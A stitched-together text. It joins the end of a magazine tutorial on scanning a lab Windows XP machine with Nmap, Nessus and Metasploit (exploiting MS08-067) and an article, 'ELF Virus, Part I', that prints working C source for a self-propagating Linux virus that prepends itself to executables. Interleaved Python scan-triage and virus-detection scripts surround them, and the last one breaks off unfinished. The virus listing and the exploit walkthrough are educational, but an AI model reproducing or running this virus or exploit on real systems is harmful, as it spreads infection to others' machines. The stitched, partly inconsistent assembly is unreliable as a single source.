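        self.unlisted = {}    # state -> count from the "Not shown:" line
        self.os_details = ""


def parse_nmap_normal(text):
    """Parse Nmap's normal (human-readable) output into Host records."""
    hosts = []
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            hosts.append(Host(m.group(1)))
            continue
        if not hosts:
            continue  # banner and progress lines before the first report
        host = hosts[-1]
        m = PORT_RE.match(line)
        if m:
            host.ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                                   m.group(4), m.group(5) or ""))
        elif line.startswith("Not shown:"):
            for count, state in UNLISTED_RE.findall(line):
                host.unlisted[state] = host.unlisted.get(state, 0) + int(count)
        elif line.startswith("OS details:"):
            host.os_details = line.split(":", 1)[1].strip()
    return hosts


def triage(host):
    """Return (label, evidence) pairs for the signs the article reads off."""
    findings = []
    exposed = [p for p in host.ports
               if p.state == "open" and p.number in FILE_SHARING_PORTS]
    if exposed:
        evidence = ", ".join("%d/%s %s" % (p.number, p.proto,
                                           FILE_SHARING_PORTS[p.number])
                             for p in exposed)
        findings.append(("file-sharing-exposed", evidence))
    # "closed" means the host answered the probe (a TCP reset in a SYN scan);
    # a packet filter that drops probes is reported as "filtered" instead.
    if host.unlisted.get("closed") and not host.unlisted.get("filtered"):
        findings.append(("no-packet-filter",
                         "%d ports answered as closed, none filtered"
                         % host.unlisted["closed"]))
    if host.os_details:
        findings.append(("os-fingerprinted", host.os_details))
    return findings


if __name__ == "__main__":
    for host in parse_nmap_normal(LISTING_1_EXCERPT):
        print(host.address)
        for label, evidence in triage(host):
            print("  %s: %s" % (label, evidence))
```

A port reported as closed only shows that the probe was answered; a firewall that rejects with resets looks the same, so treat the no-packet-filter finding as a lead to confirm on the host itself.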
This type of scan is a fingerprinting scan, which allows you to identify the OS and any services worth testing as closely as possible. The fact that you can pull this much information from a very basic scan alone indicates a low level of protection and a high level of threat. You easily can surmise that there is no local firewall, and that this box hasn’t gone through any hardening process. Although you could run many other types of scans against this box to get more information, you have enough here to continue. You could narrow down whether this is a server through a process of elimination. For example, if this is a desktop, the chances of it running a service like MS SQL or Exchange are very minimal. That said, you have enough here to proceed to the second tool, Nessus.

Listing 1. Nmap Output

Starting Nmap 5.50 ( http://nmap.org ) at 2011-11-07 15:45 EST
NSE: Loaded 57 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating ARP Ping Scan at 15:45
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 15:45, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.02s elapsed
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.56.101 [1000 ports]
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Discovered open port 135/tcp on 192.168.56.101
Completed SYN Stealth Scan at 15:46, 1.15s elapsed (1000 total ports)
Initiating Service scan at 15:46
Scanning 3 services on 192.168.56.101
Completed Service scan at 15:46, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.15s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5B:91:AC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=245 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Host script results:
| nbstat:
|   NetBIOS name: XPTESTVM, NetBIOS user: ,
|   NetBIOS MAC: 08:00:27:5b:91:ac (Cadmus Computer Systems)
|   Names
|     XPTESTVM Flags:
|     WORKGROUP Flags:
|     XPTESTVM Flags:
|     WORKGROUP Flags:
|     WORKGROUP Flags:
|_    \x01\x02__MSBROWSE__\x02 Flags:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\XPTESTVM
|_  System time: 2011-11-07 15:46:06 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.56.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
NSE: Starting runlevel 2 (of 2) scan.
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
Raw packets sent: 1072 (47.866KB) | Rcvd: 1017 (41.234KB)

With Nessus, let’s put this box to the test to see just what hackers could do to this box if they got access. Nessus now uses a Web interface, but you still can use the command line if you prefer (remember to read the man pages). For this article though, let’s stick with the Web interface. Once you log in to the Web GUI (note: it’s a slick interface), click on the scan link to begin configuring a scan.

Figure 3. Nessus Landing Page

Figure 4. Nessus Scan Page

Once you click add, configure your scan using these basic settings (Figure 5). This will give you a quick scan with minimal impact, which is key on an internal network. You don’t want to disrupt network traffic and bring on the wrath of your fellow admins and network engineers.

Once it’s complete, click on Reports and double-click your report to open it. Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of
concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let’s look at the RPC issue. Open that up and take a look at the listing (Figure 7).

Figure 5. Nessus Scan Configuration Page

Figure 6. Nessus Report on Test Box

What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).

This gives us plenty to work with, but let’s make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let’s bring in the final tool, the heavy-hitter Metasploit.

Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That’s not to say Nessus doesn’t get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to
support your findings. It never hurts to have an extra set of eyes.

Figure 7. A Lot Going on Here for a Fresh Build

Figure 8. Detailed Results

Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you’re not careful).

Start by opening a terminal, su to root (if you have given a regular user access to the proper files/directories for Metasploit, it’s best to run as said user instead of root), and run the command msfconsole (Figure 9).

Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:

show exploits

Okay, for the purpose of this example, let’s use the following command (Figure 10 shows the results), which corresponds to the previous error shown from Nessus (Figure 8):

use exploit/windows/smb/ms08_067_netapi

You could use another exploit, which
simply would crash the box, but let’s try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:

show payloads

Figure 9. Behold, Metasploit

Figure 10. Exploits Listed and Exploit Selected

Next, select the payload by using the following command:

set payload windows/speak_pwned

Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.

Figure 11. Payload Selected
Listing 2. Output of Exploit

msf exploit(ms08_067_netapi) > set payload windows/speak_pwned
payload => windows/speak_pwned
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       Pipe name to use (BROWSER, SRVSVC)

Payload options (windows/speak_pwned):

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of “pwnd”. If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).

You could try a few other exploits (actually quite a few), but this gives you a good idea of how something simple like sending an audible could cause an issue. Again, be careful, and always play on a test box.

Conclusion

As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply
using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!

Figure 12. We broke the box.

Matthew Agle is a 30-year-old senior architect. When he’s not focusing on work, hacking, security, his blog or various other hobbies, he can be found playing with his kids and generally annoying his wife. You can reach him at matthew@impromptu-it.com or http://www.impromptu-it.com.

Resources

Nmap: http://nmap.org
Metasploit: http://metasploit.com
Nessus: http://www.nessus.org
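The routine subnet sweep mentioned in the conclusion is easier to act on when the saved report is checked automatically. The following is an added example, not code from the article: it parses Nmap's normal text output (the format of Listing 1) and flags hosts that are missing from an inventory, expose the RPC/NetBIOS/SMB ports seen on the test box, or report an end-of-life OS. The function names, the watch lists and the sample report (trimmed from Listing 1, plus a second constructed host) are assumptions made for illustration.

```python
import re

# Windows RPC/NetBIOS/SMB ports that Listing 1 shows open on the unpatched XP box.
WATCHED_PORTS = {135, 139, 445}
# OS fingerprints treated as end-of-life (assumption: set this from local policy).
LEGACY_OS = ("Windows XP", "Windows Server 2003", "Windows 2000")

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?([\d.]+)\)?\s*$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
OS_RE = re.compile(r"^(?:Running|OS details): (.+)$")

# Constructed sample: the first host is trimmed from Listing 1, the second is invented.
SAMPLE = """\
Starting Nmap 5.50 ( http://nmap.org ) at 2011-11-07 15:45 EST
Discovered open port 445/tcp on 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Nmap scan report for 192.168.56.102
Host is up (0.00050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8 (protocol 2.0)
Running: Linux 2.6.X
"""


def parse_report(text):
    """Return {ip: {"ports": [...], "os": [...]}} from Nmap normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"ports": [], "os": []})
            continue
        if current is None:
            continue  # banner and -v progress lines before the first host
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current["ports"].append({
                "port": int(port), "proto": proto, "state": state,
                "service": service, "version": version.strip(),
            })
            continue
        m = OS_RE.match(line)
        if m:
            current["os"].append(m.group(1))
    return hosts


def audit(hosts, known_hosts=()):
    """Return (host, finding) pairs worth following up, in host order."""
    findings = []
    for host in sorted(hosts):
        info = hosts[host]
        if known_hosts and host not in known_hosts:
            findings.append((host, "not in inventory"))
        for p in info["ports"]:
            if p["state"] == "open" and p["port"] in WATCHED_PORTS:
                findings.append(
                    (host, "%d/%s %s exposed" % (p["port"], p["proto"], p["service"])))
        if any(tag in fp for fp in info["os"] for tag in LEGACY_OS):
            findings.append((host, "end-of-life OS fingerprint"))
    return findings


if __name__ == "__main__":
    inventory = {"192.168.56.1", "192.168.56.101"}
    for host, finding in audit(parse_report(SAMPLE), inventory):
        print(host, finding)
```

Feed it the file written by the nmap command above (/tmp/nmap-output) in place of the sample text.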
ELF Virus, Part I

How to create a simple Linux ELF virus that can infect and propagate through other ELF executables.

HIMANSHU ARORA

The history of computer viruses dates back to 1949 when Mr John von Neumann, a lecturer at the University of Illinois, wrote a paper: “Theory of self-reproducing automata”. That was just a research work, but since then, computer viruses have evolved dramatically. Apart from early systems, the Microsoft Windows OS has been a primary target for computer virus developers. Whether this is due to the number of people using that OS or the number of loopholes it carries, the debate still remains open. For the past two decades, the popularity of the Linux OS has grown in leaps and bounds with more and more Web server machines running on Linux. Using Linux on a PC or laptop is a growing trend. Linux’s growing popularity poses the new threat of it being vulnerable to virus attacks. Although the success of existing Linux viruses has been limited, the threat still remains.

In this article, I discuss a particular category of Linux viruses known as ELF viruses, but before doing that, first let me introduce some basics that should help you understand the rest of the article.
What Is ELF?

ELF stands for Executable and Linkable Format. It is a standard file format for object files, executables, shared libraries and core dumps. It became a standard binary file format for UNIX (and UNIX-like systems) in 1999.

An ELF file begins with an ELF header, which is represented as the following structure:

#define EI_NIDENT 16

typedef struct {
    unsigned char e_ident[EI_NIDENT];
    Elf32_Half    e_type;
    Elf32_Half    e_machine;
    Elf32_Word    e_version;
    Elf32_Addr    e_entry;
    Elf32_Off     e_phoff;
    Elf32_Off     e_shoff;
    Elf32_Word    e_flags;
    Elf32_Half    e_ehsize;
    Elf32_Half    e_phentsize;
    Elf32_Half    e_phnum;
    Elf32_Half    e_shentsize;
    Elf32_Half    e_shnum;
    Elf32_Half    e_shstrndx;
} Elf32_Ehdr;

Here is the description of some of the basic elements in the structure above:

1) e_ident: ELF has capabilities to support multiple processors, data encodings, classes of machines and so forth. Now, to support all this, the ELF header includes some initial bytes that specify how to interpret the file independent of the file’s contents and the processor on which the query is made. The e_ident[] array in the previous structure corresponds to these initial bytes. The following is the breakdown of the e_ident[] array:

Name        Value   Purpose
EI_MAG0     0       File identification
EI_MAG1     1       File identification
EI_MAG2     2       File identification
EI_MAG3     3       File identification
EI_CLASS    4       File class
EI_DATA     5       Data encoding
EI_VERSION  6       File version
EI_PAD      7       Start of padding bytes
EI_NIDENT   16      Size of e_ident[]

EI_MAG0 to EI_MAG3 hold a magic number consisting of the following four bytes:

'0x7f', 'E', 'L', 'F'

These four magical bytes help identify whether a file is of the ELF type or not.

2) e_type: this value helps identify the type of ELF file:

Name        Value   Meaning
ET_NONE     0       No file type
ET_REL      1       Relocatable file
ET_EXEC     2       Executable file
ET_DYN      3       Shared object file
ET_CORE     4       Core file
ET_LOPROC   0xff00  Processor-specific
ET_HIPROC   0xffff  Processor-specific

3) e_machine: this value helps identify the architecture for an ELF file:

Name            Value   Meaning
EM_NONE         0       No machine
EM_M32          1       AT&T WE 32100
EM_SPARC        2       SPARC
EM_386          3       Intel Architecture
EM_68K          4       Motorola 68000
EM_88K          5       Motorola 88000
EM_860          7       Intel 80860
EM_MIPS         8       MIPS RS3000 Big-Endian
EM_MIPS_RS4_BE  10      MIPS RS4000 Big-Endian
RESERVED        11-16   Reserved for future use

4) e_version: this value is used to identify the version of the object file:

Name        Value   Meaning
EV_NONE     0       Invalid version
EV_CURRENT  1       Current version

The value 1 signifies the original file format; extensions will create new versions with higher numbers.

What Is an ELF Virus?

An ELF virus is a malicious piece of code that mainly targets ELF executables and infects them in such a way that after being infected, either these executables start behaving abnormally or carry out some things that are invisible to the user. Most of the time, it’s the latter of the two characteristics (as mentioned earlier) that is prominent in infected ELF executables, the most common being the invisible propagation of the virus to fresh executables each time an infected executable is run. Now you can easily understand that if an ELF virus somehow gains root access to a system, it can cause havoc.

Types of ELF Viruses

Most ELF viruses are based on the Silvio Cesare File Virus. These can be divided into two categories:

1. A malicious piece of code that simply prepends itself to the start of innocent executables.

2. A malicious piece of code that is injected into the text or data segment of innocent executables.

In this article, I focus on type 1 ELF viruses.

The Virus: Explained

This virus, as mentioned previously, consists of a malicious piece of code that prepends itself to the start of other executables.
Now, because it completely prepends itself to the start of other executables, so that it propagates completely, it leaves the least dependency on its source of origin. This way, the virus creates its own copy in all the executables it infects.
This increases the life of the virus, because it would become very hard to find all the executables that are infected until you know the infection mechanism of the malicious code. Further, even if the source of the virus is deleted, the virus propagation does not stop until all the infected executables are cleaned/deleted.

Note: this virus would provide the propagation mechanism (that is, how it infects the executable to propagate), but it would refrain from showing its heart (that is, the piece of code that actually does something wrong with the infected executable or the system as a whole). This is because I don’t want to encourage any newbie to directly copy and paste the virus and use it in any destructive way.

The following is a brief description of how the virus works.

When run for the very first time or run from an infected executable, here is what happens:

1) As a very first step, it copies itself into memory. This is required, as the virus would like to prepend itself to any ELF executable it encounters. One important thing to note here is the size of the virus’ compiled code. This size is required in the code so as to read itself into memory. I have defined a macro VIRUS_SIZE as a symbolic constant for the size of the virus.

The following code reads the virus into the memory:

if (read(fd1, virus, VIRUS_SIZE) != VIRUS_SIZE)
{
    printf("\n read() failed \n");
    return 1;
}

One concern here is that someone may change, add or remove some code in the original source in a way that changes the size of the compiled binary. In that case, either manually change the value of the macro VIRUS_SIZE and make it equal to the value spit out by the command ls -l, or write a script that does this automatically every time for you.

2) In the second step, the virus determines the effective user ID of the user that has run this virus. This lets the logic determine whether the virus was run by root or any other user. Based on this information, the code decides which paths to search for ELF executables.
The following line in the code determines the effective user ID:

uid = geteuid();

3) In the third step, if the effective UID is that of root user, it starts scanning the system directories (hard-coded in the code) where there could be potential ELF executables present. If the effective UID is that of any other user, the code starts scanning the user’s login directory for any vulnerable ELF executables:
if(uid == 0)
{
    /* Ohh...root powers...*/
    /* Add more system directories that contain important binaries*/
    //if(infections < MAX_INFECT) searchForELF("/sbin", virus);
    //infecting system paths like these can cause havoc.... :-)
    if(infections < MAX_INFECT)
        searchForELF("/home/himanshu/practice/elfvirus/filetoinfect", virus); // added my own directory as I wanted only select files to be infected.
    launch_attack();
}
else
{
    /* The next two (commented) lines find the user's login directory
       and try to infect all the ELF executables it can */
    // info=*getpwuid(uid);
    // if(infections < MAX_INFECT) searchForELF(info.pw_dir, virus);
    if(infections < MAX_INFECT)
        searchForELF("/home/himanshu/practice/elfvirus/filetoinfect", virus); // added my own directory as I wanted only select files to be infected.
}

4) In the fourth step, the code checks for any valid ELF by checking its header. It checks the executable for things like it should be an ELF type, it should be for the architecture that the virus itself is compiled from, it should not be a core dump file and so on:

if(hdr.e_ident[0] != ELFMAG0 || hdr.e_ident[1] != ELFMAG1 ||
   hdr.e_ident[2] != ELFMAG2 || hdr.e_ident[3] != ELFMAG3)
{
    printf("\n Not an ELF file \n");
    return -1;
}

if (hdr.e_type != ET_EXEC && hdr.e_type != ET_DYN)
{
    printf("\n Seems to be a core dump, skipping... \n");
    return -1;
}

5) Once the ELF is verified by the code that it is a valid ELF that can be infected, then:

■ The code creates a temporary file and writes the buffer (compiled virus) that was copied in first step (step 1 above) to the temporary file created.

■ Reads the executable that is to be infected in memory and appends it to the temporary file (created above).

■ Appends a magic number (to signify that the executable is infected) at the end of this temporary file.

■ Changes the name of temp file so that it replaces the original innocent executable file.

So, in this step, the virus makes its first propagation to an executable.

6) In the sixth step, if the virus was
executed as root, it launches its most dangerous piece of code—the payload through which destruction can be done. As I have explained previously, this is a dummy function launch_attack() in the code being discussed here, as I do not want to promote copy-paste-execute behavior.

Now whenever this infected executable is launched, the virus follows all these six steps again for infecting and propagating to other executables.

If the virus is being executed from an infected executable, then after all the six steps described above, there has to be a way for the infected executable that was launched to do its work correctly, so that the user doesn’t even have an idea of what happened behind the scenes. So in this case, the following steps (7–9) occur.

7) In the seventh step, from the start of the executable, a seek to the end of virus code (that is, a seek equivalent to VIRUS_SIZE) is done. From here, all the bytes are copied (this would be compiled code of the actual executable) and written to a temporary file.

8) In the eighth step, the code forks a new process, executes this temporary file and after execution, deletes the temporary file.

9) The user sees only that he or she executed a binary and that it executed fine.

Note: I have added some log statements to signify that the target executable is infected.

Note: in the code in Listing 1 (at the end of this article), just change the path /home/himanshu/practice/elfvirus/filetoinfect to the path where some executables (that you want to infect) are kept in your machine.

Compiling the Virus

As I already mentioned, the value of the VIRUS_SIZE macro should be equal to the size of the compiled code. Here is a script that will automate the procedure:

#!/bin/sh
gcc -o elfvirus elfvirus.c
FILESIZE=`ls -l elfvirus|awk '$5 {print $5}'`
PROGSIZE=`awk '/define VIRUS_SIZE/ {print $3}' elfvirus.c`
if [ $FILESIZE -eq $PROGSIZE ];
then
    echo File sizes are correct...Ready to Roll!
else
    echo File size do not match!
    echo "Modifying source defines to VIRUS_SIZE $FILESIZE."
    awk ' {if(/define VIRUS_SIZE/) print "#define VIRUS_SIZE "'$FILESIZE'; else print $0}' elfvirus.c > elfvirus.c.new
    mv elfvirus.c elfvirus.c.bak
    mv elfvirus.c.new elfvirus.c
    ./create
fi

Simply run the above script to compile the virus code.

Output

I created a “hello world” executable in the directory where this virus searches for executables to infect. The following is a
capture from my machine:

himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ gcc -Wall hello.c -o hello
himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./hello
Hello World

As you can see, the ELF executable hello, when run, outputs “Hello World”. Now, I run the virus code:

himanshu@himanshu-laptop ~/practice/elfvirus $ ./elfvirus

Inside main

Inside searchForELF

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..]
It is a directory

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/.]
It is a directory

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello]

Inside infect
***Infected /home/himanshu/practice/elfvirus/filetoinfect/hello.

Virus executed from source and not from any infected executable. Exiting gracefully

The log statements said that the virus successfully infected /home/himanshu/practice/elfvirus/filetoinfect/hello. Now, when I again execute hello, kept at the same path, I see:

himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./hello

Inside main

Inside searchForELF

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..]
It is a directory

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/.]
It is a directory

Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello]

Could not open [/home/himanshu/practice/elfvirus/filetoinfect/hello]

Virus executed by an infected executable. Launching the executable now.

Hello World

So, it is clear from the above output that the virus has infected the executable hello, which, when run now, will try to infect other executables in the path mentioned in source code of the virus.

Conclusion

This article explains a basic ELF virus that prepends itself before other executables and infects them. This article is the first in its series. My next article will show how to infect ELF by injecting code into text or a data segment.

Himanshu Arora has been working as a software developer for the past four years. His favorite language is C. He writes technical articles for many Web sites and loves adventure journeys with friends.
Listing 1. A Simple ELF Virus

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

void launch_attack(void);
int infect(char *filename, int fd, char *virus);
void searchForELF(char *directory, char *virus);

// This value must be equal to the size of the compiled virus.
// Adjust it if the size of the compiled binary changes.
#define VIRUS_SIZE 14255
#define MAGIC 6585
#define TMPLATE "/tmp/.lx2k2XXXXXX"
#define MAX_INFECT 5
#define MAX_SIZE 1024

static int magic = MAGIC;
int infections=0;

int main(int argc, char *argv[], char *env_ptr[])
{
    printf("\n Inside main \n");

    struct stat st;
    int fd1, fd2;
    uid_t uid;
    pid_t pid;
    char * host = NULL;
    char virus[VIRUS_SIZE];
    char tmp_file[MAX_SIZE];
    //struct passwd info;
    int len = 0;

    fd1 = open(argv[0],O_RDONLY,0);

    if (fstat(fd1, &st) < 0)
    {
        printf("\n fstat() failed \n");
        return -1;
    }

    if (read(fd1, virus, VIRUS_SIZE) != VIRUS_SIZE)
    {
        printf("\n read() failed \n");
        return 1;
    }

    uid = geteuid();

    if(uid == 0)
    {
        /* Ohh...root powers...*/
        /* Add more system directories containing important binaries*/
        //if(infections < MAX_INFECT) searchForELF("/sbin", virus);
        //infecting system paths like these can cause havoc.... :-)
        if(infections < MAX_INFECT)
            searchForELF("/home/himanshu/practice/elfvirus/filetoinfect", virus); // added my own directory as I wanted only select files to be infected.
        launch_attack();
    }
    else
    {
        /* The next two (commented) lines find the user's login directory
           and try to infect all the ELF executables it can */
        // info=*getpwuid(uid);
        // if(infections < MAX_INFECT) searchForELF(info.pw_dir, virus);
        if(infections < MAX_INFECT)
            searchForELF("/home/himanshu/practice/elfvirus/filetoinfect", virus); // added my own directory as I wanted only select files to be infected.
    }

    /* Files infected, if the virus was executed from an executable,
       go ahead and launch that executable */
    len = st.st_size - VIRUS_SIZE;
    if(!len)
    {
        printf("\n Virus executed from source and not from any infected executable. Exiting gracefully\n");
        return 0;
    }
    else
    {
        printf("\n Virus executed by an infected executable. Launching the executable now...\n");
    }

    // seek at the beginning of executable code that user intended to run
    if(lseek (fd1,VIRUS_SIZE, SEEK_SET) != VIRUS_SIZE)
    {
        printf("\n lseek() failed \n");
        return -1;
    }

    // Allocate some memory to hold the executable code in bytes
    host = (char*)malloc(len);
    if(host == NULL)
    {
        printf("\n malloc() returned NULL while allocating [%d] bytes\n",len);
        return -1;
    }

    // Read the bytes
    if(read(fd1, host, len) != len)
    {
        printf("\n read() failed \n");
        return -1;
    }

    close(fd1);

    // Create a temp file
    strncpy(tmp_file, TMPLATE, MAX_SIZE);
    fd2 = mkstemp(tmp_file);
    if(fd2

[...]

        printf("\n read() failed \n");
        return -1;
    }

    if(hdr.e_ident[0] != ELFMAG0 || hdr.e_ident[1] != ELFMAG1 ||
       hdr.e_ident[2] != ELFMAG2 || hdr.e_ident[3] != ELFMAG3)
    {
        printf("\n Not an ELF file \n");
        return -1;
    }

    if (hdr.e_type != ET_EXEC && hdr.e_type != ET_DYN)
    {
        printf("\n Seems to be a core dump, skipping... \n");
        return -1;
    }

    /* Check for MAGIC number */
    if(fstat(fd1, &st) < 0)
    {
        printf("\n fstat() failed \n");
        return -1;
    }

    offset = st.st_size - sizeof(magic);
    if( lseek(fd1, offset, SEEK_SET) != offset )
    {
        printf("\n lseek() failed \n");
        return -1;
    }

    if(read(fd1, &chkmagic, sizeof(magic)) != sizeof(magic))
    {
        printf("\n read() failed \n");
        return -1;
    }

    /* Chk if already infected by this virus */
    if(chkmagic == MAGIC)
    {
        printf("\n Executable is already infected by our virus \n");
        return -1;
    }

    if(lseek(fd1, 0, SEEK_SET) != 0)
    {
        printf("\n lseek() failed \n");
        return -1;
    }

    /* create and write the virus code in a temporary file */
    strncpy(tmp_file, TMPLATE, MAX_SIZE);
    fd=mkstemp(tmp_file);
    if(fd

[...]

    /* Revert with actual permissions */
    if(fchown(fd, st.st_uid, st.st_gid) < 0)
    {
        printf("\n fchown() failed \n");
        return -1;
    }

    if(fchmod(fd, st.st_mode) < 0)
    {
        printf("\n fchmod() failed \n");
        return -1;
    }

    /* Rename temporary file with original filename */
    if(rename(tmp_file, filename) < 0)
    {
        printf("\n rename() failed \n");
        return -1;
    }

    close(fd);
    free(host);
    infections++;
    printf("***Infected %s.\n", filename);
#endif
    return 0;
}

void searchForELF(char *directory, char *virus)
{
    printf("\n Inside searchForELF \n");

    int count;
    DIR *dptr;
    struct dirent *ptr;
    int fd1, fd2;
    struct stat st;
    char filename[256];

    dptr = opendir(directory);
    ptr = readdir(dptr);

    /* Go and find some files to infect */
    if(ptr != NULL)
    {
        for (count=0; (ptr = readdir(dptr)) !=NULL && infections < MAX_INFECT; count++)
        {
            strncpy(filename, directory, 255);
            strcat(filename, "/");
            //printf("\n [%s] \n",filename);
            strncat(filename, ptr->d_name, 255-strlen(filename));
            //printf("\n [%s] \n",ptr->d_name);
            fd1=open(filename, O_RDONLY, 0);
            printf("\n Found ==> [%s] \n",filename);
            if(fd1 >= 0)
            {
                fstat(fd1, &st);
                if(S_ISDIR(st.st_mode))
                { // if a directory
                    printf(" It is a directory\n");
                    if(!(strcmp(ptr->d_name, "..")) && (!strcmp(ptr->d_name, ".")) )
                        searchForELF(filename, virus);
                }
                else if(S_ISREG(st.st_mode))
                { // if a regular file
                    fd2=open(filename, O_RDWR, 0);
                    if(fd2 >= 0)
                        infect(filename, fd2, virus); //function that infects the executable
                    else
                        printf("\n Could not open [%s]\n",filename);
                }
                close(fd2);
            }
            close(fd1);
        }
        closedir(dptr);
    }
}

void launch_attack(void)
{
    // This function is left as a dummy as this code is
    // only proof of concept, and I did not want to
    // expose any dangerous stuff.
    printf("\n Attack launched \n");
}
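The header fields and the infection layout described in this article can be turned into a triage check for suspect binaries. The following is an added example, not the author's code: it decodes e_ident and e_type using the values from the tables above, then looks for the two traces this prepender leaves behind, the MAGIC value 6585 in the last four bytes and a second ELF header inside the file where the original program now starts, and recovers that original program. It assumes the marker is a 4-byte little-endian int (as on x86); the function names and the small constructed byte strings standing in for real binaries are illustrative.

```python
import struct

ELF_MAGIC = b"\x7fELF"                      # EI_MAG0..EI_MAG3
EI_CLASS, EI_DATA, EI_VERSION = 4, 5, 6     # indexes into e_ident[]
E_TYPES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
MAGIC = 6585                                # infection marker from Listing 1


def parse_ident(data, offset=0):
    """Decode e_ident and e_type at offset; None if no plausible ELF header."""
    hdr = data[offset:offset + 18]          # e_ident[16] followed by e_type
    if len(hdr) < 18 or hdr[:4] != ELF_MAGIC:
        return None
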